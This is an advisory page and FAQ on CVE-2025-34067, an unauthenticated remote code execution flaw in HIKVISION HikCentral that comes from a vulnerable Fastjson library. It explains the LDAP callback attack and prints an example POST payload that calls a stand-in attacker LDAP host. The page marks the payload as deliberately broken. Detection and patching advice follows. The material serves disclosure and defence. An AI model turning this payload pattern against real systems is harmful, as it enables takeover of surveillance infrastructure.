What is HIKVISION HikCentral and why is this vulnerability significant?

HikCentral serves as HIKVISION's security management solution to centralize the monitoring and administration of surveillance systems. This vulnerability is significant because it allows attackers to gain complete control over surveillance infrastructure without any authentication, potentially compromising entire security networks.

Why does this HIKVISION vulnerability have a perfect CVSS score of 10.0?

The vulnerability receives the maximum CVSS score of 10.0 because it allows unauthenticated remote attackers to execute arbitrary code on critical security infrastructure. The combination of no authentication required, remote exploitation capability, and complete system compromise makes this the highest possible threat level.

How does the HIKVISION HikCentral vulnerability work technically?

The vulnerability affects the /bic/ssoService/v1/applyCT endpoint, which processes JSON input without proper authentication. Attackers can craft malicious POST requests with JSON payloads that reference the JdbcRowSetImpl class, enabling them to load arbitrary Java classes through malicious LDAP URLs and execute code on the underlying system.

What is the root cause of this HIKVISION security flaw?

The flaw is caused by the platform's use of a vulnerable version of the Fastjson library. This library automatically instantiates Java classes based on JSON input, and when combined with the JdbcRowSetImpl class, it creates a path for attackers to load and execute malicious code through LDAP callbacks.

What can attackers do once they exploit this HIKVISION vulnerability?

Successful exploitation allows attackers to execute arbitrary code on the HikCentral system without authentication. This could enable them to control surveillance cameras, access recorded footage, monitor live feeds, steal sensitive data, install malware, or use the compromised system as a launching point for attacks against other network resources.

Which specific endpoint is vulnerable in HIKVISION HikCentral?

The vulnerable endpoint is /bic/ssoService/v1/applyCT, which processes JSON input without proper authentication requirements. This endpoint can be exploited by sending malicious POST requests with specially crafted JSON payloads.

How do the LDAP callback attacks work in this HIKVISION vulnerability?

Attackers manipulate the datasource parameter to point to an attacker-controlled LDAP server. When the vulnerable system connects to this malicious LDAP server, the attacker's server responds with malicious Java bytecode that gets executed on the target system, achieving remote code execution.

What should organizations do immediately about this HIKVISION vulnerability?

Organizations should prioritize updating to a patched version of HikCentral that eliminates the use of the vulnerable Fastjson library. Given the perfect CVSS score and ease of exploitation, this should be treated as an emergency security update requiring immediate attention.

Are there any temporary protective measures for this HIKVISION vulnerability?

As interim protective measures, administrators should restrict network access to the vulnerable /bic/ssoService/v1/applyCT endpoint from untrusted networks and implement monitoring for suspicious outbound LDAP traffic patterns that could indicate exploitation attempts.

Does this HIKVISION vulnerability require authentication to exploit?

No, this vulnerability allows unauthenticated remote code execution. Attackers do not need valid credentials or prior access to the HikCentral system to exploit this vulnerability and gain complete control over the surveillance infrastructure.

What is the Fastjson library and why is it problematic?

Fastjson is a Java library used for parsing JSON data. The vulnerable version automatically instantiates Java classes based on the '@type' field in JSON input without proper security checks. This feature can be exploited to load malicious classes and achieve code execution when combined with certain Java classes like JdbcRowSetImpl.

How can organizations detect exploitation attempts against their HIKVISION systems?

Organizations should monitor for suspicious POST requests to the /bic/ssoService/v1/applyCT endpoint, unusual outbound LDAP connections, and network traffic to unknown LDAP servers. Log analysis should focus on JSON payloads containing '@type' fields and datasource parameters pointing to external LDAP URLs.

What makes surveillance system vulnerabilities particularly dangerous?

Surveillance system vulnerabilities are particularly dangerous because they can provide attackers with physical security oversight, access to sensitive recorded footage, ability to monitor live activities, and often serve as entry points into broader network infrastructure. Compromised surveillance systems can also be used for espionage or to disable security monitoring during other attacks.

What should organizations look for when monitoring for this HIKVISION vulnerability?

Organizations should monitor for HTTP POST requests to /bic/ssoService/v1/applyCT containing JSON payloads with '@type' fields, datasource parameters with LDAP URLs, outbound connections to unknown LDAP servers, and any unusual Java class instantiation attempts. Network traffic analysis should focus on identifying LDAP callback patterns typical of Fastjson exploitation.

How urgent is it to patch this HIKVISION HikCentral vulnerability?

This should be treated as an emergency security update requiring immediate action. The perfect CVSS score of 10.0, combined with the ease of exploitation and potential for complete system compromise of critical security infrastructure, makes this one of the highest priority vulnerabilities to address.

Advisory

Remote code execution flaw reported in HIKVISION Security Management Platforms

Q: What is the critical vulnerability discovered in HIKVISION's security platform?

HIKVISION is reporting a critical security vulnerability tracked as CVE-2025-34067 with a perfect CVSS score of 10.0 affecting its applyCT security management platform, also known as HikCentral. The flaw allows unauthenticated remote code execution due to the platform's use of a vulnerable version of the Fastjson library.

published: July 4, 2025

Take action: If you have HIKVISION HikCentral security management systems, make sure it's isolated it from the internet and accessible only from trusted networks. Also block outbound LDAP connections, and then plan a quick patch cycle. Because isolation will never be enough with maximum severity flaw.

Learn More

HIKVISION is reporting a critical security vulnerability affecting its applyCT security management platform, also known as HikCentral. It serves as HIKVISION's security management solution to centralize the monitoring and administration of surveillance systems.

The flaw is tracked as CVE-2025-34067 (CVSS score 10.0) and is caused by the platform's use of a vulnerable version of the Fastjson library, which creates a path for unauthenticated remote code execution. The vulnerability affects the /bic/ssoService/v1/applyCT endpoint, which processes JSON input without proper authentication requirements.

Attackers can craft malicious POST request with JSON payloads that reference the JdbcRowSetImpl class, enabling them to load arbitrary Java classes through malicious LDAP URLs. This attack vector allows threat actors to execute arbitrary code on the underlying system by manipulating the datasource parameter to point to an attacker-controlled LDAP server (intentionally broken example):

POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: vulnerable-hikvision-server.example.com
Content-Type: application/json
Content-Length: 245
 {
  "datasource": "ldap://attacker-server.example.com:1389/ExampleExploit",
  "username": "test_user",
  "loginData": {
    "@type": "com.example.database.FakeRowSetImpl",
    "dataSourceName": "ldap://attacker-server.example.com:1389/ExampleExploit",
    "autoCommit": true
  }
}

Target Endpoint: The request hits /bic/ssoService/v1/applyCT which processes JSON without authentication
Fastjson Exploitation: The @type field tells Fastjson to automatically instantiate a specific Java class (in this example, a fake "FakeRowSetImpl")
LDAP Callback: The dataSourceName parameter containing an LDAP URL causes the system to connect to the attacker's server
Code Execution: When the system connects to ldap://attacker-server.example.com:1389/ExampleExploit, the attacker's LDAP server responds with malicious Java bytecode that gets executed

Organizations should prioritize updating to a patched version of HikCentral that eliminates the use of the vulnerable Fastjson library. As an interim protective measure, administrators should restrict network access to the vulnerable endpoint from untrusted networks and implement monitoring for suspicious outbound LDAP traffic patterns that could indicate exploitation attempts.

Remote code execution flaw reported in HIKVISION Security Management Platforms

Read More
Vulnerabilities discovered in high-power Bosch network connected torque …
Siemens Automation License Manager vulnerable to remote takeover
Critical vulnerability reported in Siemens SIMATIC Virtualization Service
Critical Authentication Bypass in PX4 Autopilot Allows Remote …
Critical Bluetooth vulnerability reported in SunPower Solar Inverters